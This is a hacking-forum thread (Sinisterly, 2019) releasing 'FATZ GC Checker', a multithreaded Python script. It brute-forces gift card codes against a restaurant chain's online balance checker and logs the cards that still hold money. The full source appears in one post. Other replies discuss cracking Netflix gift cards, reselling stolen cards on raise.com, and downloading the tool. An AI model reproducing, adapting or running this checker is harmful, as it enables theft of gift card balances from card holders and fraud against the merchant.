Sinisterly
Gold [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools)
+--- Thread: Gold [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | (/Thread-Gold-RELEASE-FATZ-GIFTCARDS-200-CPM-2K-HOUR-FREE-MONEY)

Pages: 1 2


RE: [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | - fsociety - 05-04-2019

(05-04-2019, 05:50 AM)killerabella Wrote:
(05-04-2019, 05:19 AM)fsociety Wrote:
(05-04-2019, 05:12 AM)mothered Wrote: Looks good, I love working with the CLI.

I'll be adding this to my cracking blog later this afternoon.
Thanks.

Tongue  Tongue  Tongue  this company is located in Southeastern United States.but not getting sites of giftcard to sell . i found raise.com site but this site only work in itself country not internationally. Notamused  Notamused

and one  more things now no netflix giftcard crack because they now include captch or its only coming in my.?


DO YOU HAVE STEAM KEYS OR STEAM WALLET CODE?

no


RE: [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | - mothered - 05-04-2019

(05-04-2019, 05:19 AM)fsociety Wrote:
(05-04-2019, 05:12 AM)mothered Wrote: Looks good, I love working with the CLI.

I'll be adding this to my cracking blog later this afternoon.
Thanks.

Tongue  Tongue  Tongue  this company is located in Southeastern United States.but not getting sites of giftcard to sell . i found raise.com site but this site only work in itself country not internationally. Notamused  Notamused

and one  more things now no netflix giftcard crack because they now include captch or its only coming in my.?

Thanks for the Info.

I'll check It out for myself and see what It entails.


RE: [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | - Request - 05-04-2019

Source code, in case anyone wanted to modify/use on something that's NOT WINDOWS (AUGH):
Code:
from multiprocessing.dummy import Pool import multiprocessing, requests, os, random, re, easygui from datetime import datetime from colorama import init, Fore init() os.system('title FATZ GC Checker 1.0 by Yuri#3849 - Idle [0/0] - Hits: 0 , Bad: 0 ') print('\n{}\n _____ _ _____ _____ ____ ____ \n | ___| / \\ |_ _| |__ / / ___| / ___|\n | |_ / _ \\ | | / / | | _ | | \n | _| / ___ \\ | | / /_ | |_| | | |___ \n |_| /_/ \\_\\ |_| /____| \\____| \\____|\n \n{} \n ( Project By Yuri )\n\n <<<<< Exclusive To Hackinglounge >>>>>\n\n'.format(Fore.LIGHTRED_EX, Fore.LIGHTWHITE_EX)) lock = multiprocessing.Lock() combo_txt = easygui.fileopenbox() print(' ') thread_num = int(input('[+] Enter number of threads: ')) print(' ') combo_len = len((open(combo_txt, 'r', errors='ignore')).read().split('\n')) Hits = 0 Bad = 0 now = datetime.now() current_time = now.strftime('%H:%M:%S') class Output: def put(self, code, case, capture=None): global Bad global Hits txt_Hits = open('Hits.txt', 'a+') lock.acquire() if case == True: Hits += 1 if capture != None: print('{}[{}] | [HIT] {}{} Capture ~ {} {}{}'.format(Fore.LIGHTGREEN_EX, current_time, code, Fore.LIGHTWHITE_EX, Fore.LIGHTGREEN_EX, capture, Fore.LIGHTWHITE_EX)) else: print('{}[{}] | [HIT] {} {}'.format(Fore.LIGHTGREEN_EX, current_time, code, Fore.LIGHTWHITE_EX)) txt_Hits.write('{} | {} \n'.format(code, capture)) txt_Hits.close() else: if case == False: Bad += 1 print('{}[{}] | [FAIL] {} {}'.format(Fore.LIGHTRED_EX, current_time, code, Fore.LIGHTWHITE_EX)) os.system('title ' + 'FATZ GC Checker 1.0 by Yuri#3849 - Checking [{}/{}] - Hits: {} , Bad: {} '.format(Hits + Bad, combo_len, Hits, Bad)) lock.release() class Post: def find_between(self, s, first, last): try: start = s.index(first) + len(first) end = s.index(last, start) return s[start:end] except ValueError: return '' def login(self, code): while True: try: session = requests.session() api = 'https://fatz.com/balance-checker/?cn=' + code + '' headers = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36', 'content-type':'application/x-www-form-urlencoded', 'accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3'} req = session.get(api, headers=headers) src = req.text if '$0.00' in src: Output().put(code, False) else: if 'You have' in src: cap = self.find_between(src, '<b>$', '</b> remaining').strip() Output().put(code, True, 'Balance : {}$'.format(cap)) else: if '502 Bad Gateway' in src: raise Exception break except Exception as e: try: pass finally: e = None del e class Thread: def __init__(self, cmb_txt, threads): self.cmb_txt = cmb_txt self.threads = threads self.accounts = [] def load(self): with open(self.cmb_txt, errors='ignore') as (f): lines = f.read().split('\n') for line in lines: if line != '': self.accounts.append({'code': line}) def brute(self, account): code = account['code'] Post().login(code) def main(self): self.load() pool = Pool(self.threads) for _ in pool.imap_unordered(self.brute, self.accounts): pass if __name__ == '__main__': Thread(combo_txt, thread_num).main() print(' ') input('[+] Completed')



RE: [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | - jsun1467 - 05-04-2019

How do i download? Opened the link just a bunch of spam


RE: [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | - Request - 05-04-2019

(05-04-2019, 10:56 PM)jsun1467 Wrote: How do i download? Opened the link just a bunch of spam

Scroll to the bottom and click "I am not a Robot" -> Continue -> Scroll down to the bottom again, and wait for the timer to be over -> Get Link -> Download


RE: [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | - fsociety - 05-05-2019

(05-04-2019, 10:56 PM)jsun1467 Wrote: How do i download? Opened the link just a bunch of spam

i made a video for you https://www.youtube.com/watch?v=ytG9fwaLZ-k


RE: [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | - jsun1467 - 05-05-2019

Thnak you sir forgive my ignorance


RE: [RELEASE] FATZ - GIFTCARDS | 200 CPM | 2K / HOUR | FREE MONEY | - SomeRandomGuy212 - 05-05-2019

Just downloaded it. Thank you so much.